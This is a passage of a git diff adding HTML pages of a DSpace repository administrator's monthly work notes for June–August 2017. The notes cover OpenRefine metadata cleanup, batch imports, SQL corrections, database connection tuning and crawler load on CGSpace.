+<li>Working on how to automate the extraction of the CIAT Book chapters, doing some magic in OpenRefine to extract page from–to from cg.identifier.url and dc.format.extent, respectively:
+<ul>
+<li>cg.identifier.url: <code>value.split(&quot;page=&quot;, &quot;&quot;)[1]</code></li>
+<li>dc.format.extent: <code>value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[1].toNumber() - value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[0].toNumber()</code></li>
+</ul>
+</li>
+<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&rdquo;), create a new column with last page number:
+<ul>
+<li><code>cells[&quot;dc.page.from&quot;].value.toNumber() + cells[&quot;dc.format.pages&quot;].value.toNumber()</code></li>
+</ul>
+</li>
+<li>Then create a new, unique file name to be used in the output, based on a SHA1 of the dc.title and with a description:
+<ul>
+<li>dc.page.to: <code>value.split(&quot; &quot;)[0].replace(&quot;,&quot;,&quot;&quot;).toLowercase() + &quot;-&quot; + sha1(value).get(1,9) + &quot;.pdf__description:&quot; + cells[&quot;dc.type&quot;].value</code></li>
+</ul>
+</li>
+<li>Start processing 769 records after filtering the following (there are another 159 records that have some other format, or for example they have their own PDF which I will process later), using a modified <code>generate-thumbnails.py</code> script to read certain fields and then pass to GhostScript:
+<ul>
+<li>cg.identifier.url: <code>value.contains(&quot;page=&quot;)</code></li>
+<li>dc.format.extent: <code>or(value.contains(&quot;p. &quot;),value.contains(&quot; p.&quot;))</code></li>
+<li>Command like: <code>$ gs -dNOPAUSE -dBATCH -dFirstPage=14 -dLastPage=27 -sDEVICE=pdfwrite -sOutputFile=beans.pdf -f 12605-1.pdf</code></li>
+</ul>
+</li>
+<li>17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF</li>
+<li>I&rsquo;ve flagged them and proceeded without them (752 total) on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
+</code></pre><ul>
+<li>I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)</li>
+<li>Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT</li>
+<li>Restart Tomcat on CGSpace so that the <code>cg.identifier.wletheme</code> field is available on REST API for Macaroni Bros</li>
+</ul>
+<h2 id="2017-06-07">2017-06-07</h2>
+<ul>
+<li>Testing <a href="https://github.com/ilri/DSpace/pull/319">Atmire&rsquo;s patch for the CUA Workflow Statistics again</a></li>
+<li>Still doesn&rsquo;t seem to give results I&rsquo;d expect, like there are no results for Maria Garruccio, or for the ILRI community!</li>
+<li>Then I&rsquo;ll file an update to the issue on Atmire&rsquo;s tracker</li>
+<li>Created a new branch with just the relevant changes, so I can send it to them</li>
+<li>One thing I noticed is that there is a failed database migration related to CUA:</li>
+</ul>
+<pre tabindex="0"><code>+----------------+----------------------------+---------------------+---------+
+| Version        | Description                | Installed on        | State   |
++----------------+----------------------------+---------------------+---------+
+| 1.1            | Initial DSpace 1.1 databas |                     | PreInit |
+| 1.2            | Upgrade to DSpace 1.2 sche |                     | PreInit |
+| 1.3            | Upgrade to DSpace 1.3 sche |                     | PreInit |
+| 1.3.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.4            | Upgrade to DSpace 1.4 sche |                     | PreInit |
+| 1.5            | Upgrade to DSpace 1.5 sche |                     | PreInit |
+| 1.5.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.6            | Upgrade to DSpace 1.6 sche |                     | PreInit |
+| 1.7            | Upgrade to DSpace 1.7 sche |                     | PreInit |
+| 1.8            | Upgrade to DSpace 1.8 sche |                     | PreInit |
+| 3.0            | Upgrade to DSpace 3.x sche |                     | PreInit |
+| 4.0            | Initializing from DSpace 4 | 2015-11-20 12:42:52 | Success |
+| 5.0.2014.08.08 | DS-1945 Helpdesk Request a | 2015-11-20 12:42:53 | Success |
+| 5.0.2014.09.25 | DS 1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2014.09.26 | DS-1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2015.01.27 | MigrateAtmireExtraMetadata | 2015-11-20 12:43:29 | Success |
+| 5.0.2017.04.28 | CUA eperson metadata migra | 2017-06-07 11:07:28 | OutOrde |
+| 5.5.2015.12.03 | Atmire CUA 4 migration     | 2016-11-27 06:39:05 | OutOrde |
+| 5.5.2015.12.03 | Atmire MQM migration       | 2016-11-27 06:39:06 | OutOrde |
+| 5.6.2016.08.08 | CUA emailreport migration  | 2017-01-29 11:18:56 | OutOrde |
++----------------+----------------------------+---------------------+---------+
+</code></pre><ul>
+<li>Merge the pull request for <a href="https://github.com/ilri/DSpace/pull/328">WLE Phase II themes</a></li>
+</ul>
+<h2 id="2017-06-18">2017-06-18</h2>
+<ul>
+<li>Redeploy CGSpace with latest changes from <code>5_x-prod</code>, run system updates, and reboot the server</li>
+<li>Continue working on ansible infrastructure changes for CGIAR Library</li>
+</ul>
+<h2 id="2017-06-20">2017-06-20</h2>
+<ul>
+<li>Import Abenet and Peter&rsquo;s changes to the CGIAR Library CRP community</li>
+<li>Due to them using Windows and renaming some columns there were formatting, encoding, and duplicate metadata value issues</li>
+<li>I had to remove some fields from the CSV and rename some back to, ie, <code>dc.subject[en_US]</code> just so DSpace would detect changes properly</li>
+<li>Now it looks much better: <a href="https://dspacetest.cgiar.org/handle/10947/2517">https://dspacetest.cgiar.org/handle/10947/2517</a></li>
+<li>Removing the HTML tags and HTML/XML entities using the following GREL:
+<ul>
+<li><code>replace(value,/&lt;\/?\w+((\s+\w+(\s*=\s*(?:&quot;.*?&quot;|'.*?'|[^'&quot;&gt;\s]+))?)+\s*|\s*)\/?&gt;/,'')</code></li>
+<li><code>value.unescape(&quot;html&quot;).unescape(&quot;xml&quot;)</code></li>
+</ul>
+</li>
+<li>Finally import 914 CIAT Book Chapters to CGSpace in two batches:</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
+$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
+</code></pre><h2 id="2017-06-25">2017-06-25</h2>
+<ul>
+<li>WLE has said that one of their Phase II research themes is being renamed from <code>Regenerating Degraded Landscapes</code> to <code>Restoring Degraded Landscapes</code></li>
+<li>Pull request with the changes to <code>input-forms.xml</code>: <a href="https://github.com/ilri/DSpace/pull/329">#329</a></li>
+<li>As of now it doesn&rsquo;t look like there are any items using this research theme so we don&rsquo;t need to do any updates:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like &#39;Regenerating Degraded Landscapes%&#39;;
+ text_value
+------------
+(0 rows)
+</code></pre><ul>
+<li>Marianne from WLE asked if they can have both Phase I and II research themes together in the item submission form</li>
+<li>Perhaps we can add them together in the same question for <code>cg.identifier.wletheme</code></li>
+</ul>
+<h2 id="2017-06-30">2017-06-30</h2>
+<ul>
+<li>CGSpace went down briefly, I see lots of these errors in the dspace logs:</li>
+</ul>
+<pre tabindex="0"><code>Java stacktrace: java.util.NoSuchElementException: Timeout waiting for idle object
+</code></pre><ul>
+<li>After looking at the Tomcat logs, Munin graphs, and PostgreSQL connection stats, it seems there is just a high load</li>
+<li>Might be a good time to adjust DSpace&rsquo;s database connection settings, like I first mentioned in April, 2017 after reading the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">2017-04 DCAT comments</a></li>
+<li>I&rsquo;ve adjusted the following in CGSpace&rsquo;s config:
+<ul>
+<li><code>db.maxconnections</code> 30→70 (the default PostgreSQL config allows 100 connections, so DSpace&rsquo;s default of 30 is quite low)</li>
+<li><code>db.maxwait</code> 5000→10000</li>
+<li><code>db.maxidle</code> 8→20 (DSpace default is -1, unlimited, but we had set it to 8 earlier)</li>
+</ul>
+</li>
+<li>We will need to adjust this again (as well as the <code>pg_hba.conf</code> settings) when we deploy tsega&rsquo;s REST API</li>
+<li>Whip up a test for Marianne of WLE to be able to show both their Phase I and II research themes in the CGSpace item submission form:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/06/wle-theme-test-a.png" alt="Test A for displaying the Phase I and II research themes">
+<img src="/cgspace-notes/2017/06/wle-theme-test-b.png" alt="Test B for displaying the Phase I and II research themes"></p>
+
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-07/index.html b/docs/2017-07/index.html
new file mode 100644
index 000000000..ef1689539
--- /dev/null
+++ b/docs/2017-07/index.html
@@ -0,0 +1,329 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2017" />
+<meta property="og:description" content="2017-07-01
+
+Run system updates and reboot DSpace Test
+
+2017-07-04
+
+Merge changes for WLE Phase II theme rename (#329)
+Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
+We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-07/" />
+<meta property="article:published_time" content="2017-07-01T18:03:52+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2017"/>
+<meta name="twitter:description" content="2017-07-01
+
+Run system updates and reboot DSpace Test
+
+2017-07-04
+
+Merge changes for WLE Phase II theme rename (#329)
+Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
+We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-07/",
+  "wordCount": "1151",
+  "datePublished": "2017-07-01T18:03:52+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-07/">
+
+    <title>July, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-07/">July, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-07-01T18:03:52+03:00">Sat Jul 01, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-07-01">2017-07-01</h2>
+<ul>
+<li>Run system updates and reboot DSpace Test</li>
+</ul>
+<h2 id="2017-07-04">2017-07-04</h2>
+<ul>
+<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li>
+<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
+<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspacenew -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*):  &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39;
+</code></pre><ul>
+<li>The <code>sed</code> script is from a post on the <a href="https://www.postgresql.org/message-id/437E44A5.508%40ultimeth.com">PostgreSQL mailing list</a></li>
+<li>Abenet says the ILRI board wants to be able to have &ldquo;lead author&rdquo; for every item, so I&rsquo;ve whipped up a WIP test in the <code>5_x-lead-author</code> branch</li>
+<li>It works but is still very rough and we haven&rsquo;t thought out the whole lifecycle yet</li>
+</ul>
+<p><img src="/cgspace-notes/2017/07/lead-author-test.png" alt="Testing lead author in submission form"></p>
+<ul>
+<li>I assume that &ldquo;lead author&rdquo; would actually be the first question on the item submission form</li>
+<li>We also need to check to see which ORCID authority core this uses, because it seems to be using an entirely new one rather than the one for <code>dc.contributor.author</code> (which makes sense of course, but fuck, all the author problems aren&rsquo;t bad enough?!)</li>
+<li>Also would need to edit XMLUI item displays to incorporate this into authors list</li>
+<li>And fuck, then anyone consuming our data via REST / OAI will not notice that we have an author outside of <code>dc.contributor.authors</code>&hellip; ugh</li>
+<li>What if we modify the item submission form to use <a href="https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ItemtypeBasedMetadataCollection"><code>type-bind</code> fields to show/hide certain fields depending on the type</a>?</li>
+</ul>
+<h2 id="2017-07-05">2017-07-05</h2>
+<ul>
+<li>Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (<a href="https://github.com/ilri/DSpace/pull/330">#330</a>)</li>
+<li>Generate list of fields in the current CGSpace <code>cg</code> scheme so we can record them properly in the metadata registry:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*):  &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39; &gt; cg-types.xml
+</code></pre><ul>
+<li>CGSpace was unavailable briefly, and I saw this error in the DSpace log file:</li>
+</ul>
+<pre tabindex="0"><code>2017-07-05 13:05:36,452 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserved for non-replication superuser connections
+</code></pre><ul>
+<li>Looking at the <code>pg_stat_activity</code> table I saw there were indeed 98 active connections to PostgreSQL, and at this time the limit is 100, so that makes sense</li>
+<li>Tsega restarted Tomcat and it&rsquo;s working now</li>
+<li>Abenet said she was generating a report with Atmire&rsquo;s CUA module, so it could be due to that?</li>
+<li>Looking in the logs I see this random error again that I should report to DSpace:</li>
+</ul>
+<pre tabindex="0"><code>2017-07-05 13:50:07,196 ERROR org.dspace.statistics.SolrLogger @ COUNTRY ERROR: EU
+</code></pre><ul>
+<li>Seems to come from <code>dspace-api/src/main/java/org/dspace/statistics/SolrLogger.java</code></li>
+</ul>
+<h2 id="2017-07-06">2017-07-06</h2>
+<ul>
+<li>Sisay tried to help by making a <a href="https://github.com/ilri/DSpace/pull/331">pull request for the RTB flagships</a> but there are formatting errors, unrelated changes, and the flagship names are not in the style I requested</li>
+<li>Abenet talked to CIP and they said they are actually ok with using collection names rather than adding a new metadata field</li>
+</ul>
+<h2 id="2017-07-13">2017-07-13</h2>
+<ul>
+<li>Remove <code>UKaid</code> from the controlled vocabulary for <code>dc.description.sponsorship</code>, as <code>Department for International Development, United Kingdom</code> is the correct form and it is already present (<a href="https://github.com/ilri/DSpace/pull/334">#334</a>)</li>
+</ul>
+<h2 id="2017-07-14">2017-07-14</h2>
+<ul>
+<li>Sisay sent me a patch to add &ldquo;Photo Report&rdquo; to <code>dc.type</code> so I&rsquo;ve added it to the <code>5_x-prod</code> branch</li>
+</ul>
+<h2 id="2017-07-17">2017-07-17</h2>
+<ul>
+<li>Linode shut down our seventeen (17) VMs due to nonpayment of the July 1st invoice</li>
+<li>It took me a few hours to find the ICT/Finance contacts to pay the bill and boot all the servers back up</li>
+<li>Since the server was down anyways, I decided to run all system updates and re-deploy CGSpace so that the latest changes to <code>input-forms.xml</code> and the sponsors controlled vocabulary</li>
+</ul>
+<h2 id="2017-07-20">2017-07-20</h2>
+<ul>
+<li>Skype chat with Addis team about the status of the CGIAR Library migration</li>
+<li>Need to add the CGIAR System Organization subjects to Discovery Facets (test first)</li>
+<li>Tentative list of dates for the migration:
+<ul>
+<li>August 4: aim to finish data cleanup and then give Peter a list of authors</li>
+<li>August 18: ready to show System Office</li>
+<li>September 4: all feedback and decisions (including workflows) from System Office</li>
+<li>September 10/11: go live?</li>
+</ul>
+</li>
+<li>Talk to Tsega and Danny about exporting/injesting the blog posts from Drupal into DSpace?</li>
+<li>Followup meeting on August 8/9?</li>
+<li>Sent Abenet the 2415 records from CGIAR Library&rsquo;s Historical Archive (10947/1) after cleaning up the author authorities and HTML entities in <code>dc.contributor.author</code> and <code>dc.description.abstract</code> using OpenRefine:
+<ul>
+<li>Authors: <code>value.replace(/::\w{8}-\w{4}-\w{4}-\w{4}-\w{12}::600/,&quot;&quot;)</code></li>
+<li>Abstracts: <code>replace(value,/&lt;\/?\w+((\s+\w+(\s*=\s*(?:&quot;.*?&quot;|'.*?'|[^'&quot;&gt;\s]+))?)+\s*|\s*)\/?&gt;/,'')</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2017-07-24">2017-07-24</h2>
+<ul>
+<li>Move two top-level communities to be sub-communities of ILRI Projects</li>
+</ul>
+<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&#34;$community&#34;; done
+</code></pre><ul>
+<li>Discuss CGIAR Library data cleanup with Sisay and Abenet</li>
+</ul>
+<h2 id="2017-07-27">2017-07-27</h2>
+<ul>
+<li>Help Sisay with some transforms to add descriptions to the <code>filename</code> column of some CIAT Presentations he&rsquo;s working on in OpenRefine</li>
+<li>Marianne emailed a few days ago to ask why &ldquo;Integrating Ecosystem Solutions&rdquo; was not in the list of WLE Phase I Research Themes on the input form</li>
+<li>I told her that I only added the themes that I saw in the <a href="https://cgspace.cgiar.org/handle/10568/34508">WLE Phase I Research Themes</a> community</li>
+<li>Then Mia from WLE also emailed to ask where some WLE focal regions went, and I said I didn&rsquo;t understand what she was talking about, as all we did in our previous work was rename the old &ldquo;Research Themes&rdquo; subcommunity to &ldquo;WLE Phase I Research Themes&rdquo; and add a new subcommunity for &ldquo;WLE Phase II Research Themes&rdquo;.</li>
+<li>Discuss some modifications to the CCAFS project tags in CGSpace submission form and in the database</li>
+</ul>
+<h2 id="2017-07-28">2017-07-28</h2>
+<ul>
+<li>Discuss updates to the Phase II CCAFS project tags with Andrea from Macaroni Bros</li>
+<li>I will do the renaming and untagging of items in CGSpace database, and he will update his webservice with the latest project tags and I will get the XML from here for our <code>input-forms.xml</code>: <a href="https://ccafs.cgiar.org/export/ccafsproject">https://ccafs.cgiar.org/export/ccafsproject</a></li>
+</ul>
+<h2 id="2017-07-29">2017-07-29</h2>
+<ul>
+<li>Move some WLE items into appropriate Phase I Research Themes communities and delete some empty collections in WLE Regions community</li>
+</ul>
+<h2 id="2017-07-30">2017-07-30</h2>
+<ul>
+<li>Start working on CCAFS project tag cleanup</li>
+<li>More questions about inconsistencies and spelling mistakes in their tags, so I&rsquo;ve sent some questions for followup</li>
+</ul>
+<h2 id="2017-07-31">2017-07-31</h2>
+<ul>
+<li>Looks like the final list of metadata corrections for CCAFS project tags will be:</li>
+</ul>
+<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
+update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
+update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
+</code></pre><ul>
+<li>Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list</li>
+<li>Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations</li>
+<li>Looking at CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grep it)!</li>
+</ul>
+<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk &#39;{print $5}&#39; | sort | uniq | wc -l
+52
+</code></pre><ul>
+<li>From looking at the <code>dspace.log</code> I see they are all using the same session, which means our Crawler Session Manager Valve is working</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-08/index.html b/docs/2017-08/index.html
new file mode 100644
index 000000000..f88f302eb
--- /dev/null
+++ b/docs/2017-08/index.html
@@ -0,0 +1,571 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2017" />
+<meta property="og:description" content="2017-08-01
+
+Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours
+I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)
+The good thing is that, according to dspace.log.2017-08-01, they are all using the same Tomcat session
+This means our Tomcat Crawler Session Valve is working
+But many of the bots are browsing dynamic URLs like:
+
+/handle/10568/3353/discover
+/handle/10568/16510/browse
+
+
+The robots.txt only blocks the top-level /discover and /browse URLs&hellip; we will need to find a way to forbid them from accessing these!
+Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): https://jira.duraspace.org/browse/DS-2962
+It turns out that we&rsquo;re already adding the X-Robots-Tag &quot;none&quot; HTTP header, but this only forbids the search engine from indexing the page, not crawling it!
+Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;
+We might actually have to block these requests with HTTP 403 depending on the user agent
+Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415
+This was due to newline characters in the dc.description.abstract column, which caused OpenRefine to choke when exporting the CSV
+I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
+Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-08/" />
+<meta property="article:published_time" content="2017-08-01T11:51:52+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2017"/>
+<meta name="twitter:description" content="2017-08-01
+
+Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours
+I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)
+The good thing is that, according to dspace.log.2017-08-01, they are all using the same Tomcat session
+This means our Tomcat Crawler Session Valve is working
+But many of the bots are browsing dynamic URLs like:
+
+/handle/10568/3353/discover
+/handle/10568/16510/browse
+
+
+The robots.txt only blocks the top-level /discover and /browse URLs&hellip; we will need to find a way to forbid them from accessing these!
+Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): https://jira.duraspace.org/browse/DS-2962
+It turns out that we&rsquo;re already adding the X-Robots-Tag &quot;none&quot; HTTP header, but this only forbids the search engine from indexing the page, not crawling it!
+Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;
+We might actually have to block these requests with HTTP 403 depending on the user agent
+Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415
+This was due to newline characters in the dc.description.abstract column, which caused OpenRefine to choke when exporting the CSV
+I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
+Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-08/",
+  "wordCount": "3542",
+  "datePublished": "2017-08-01T11:51:52+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-08/">
+
+    <title>August, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
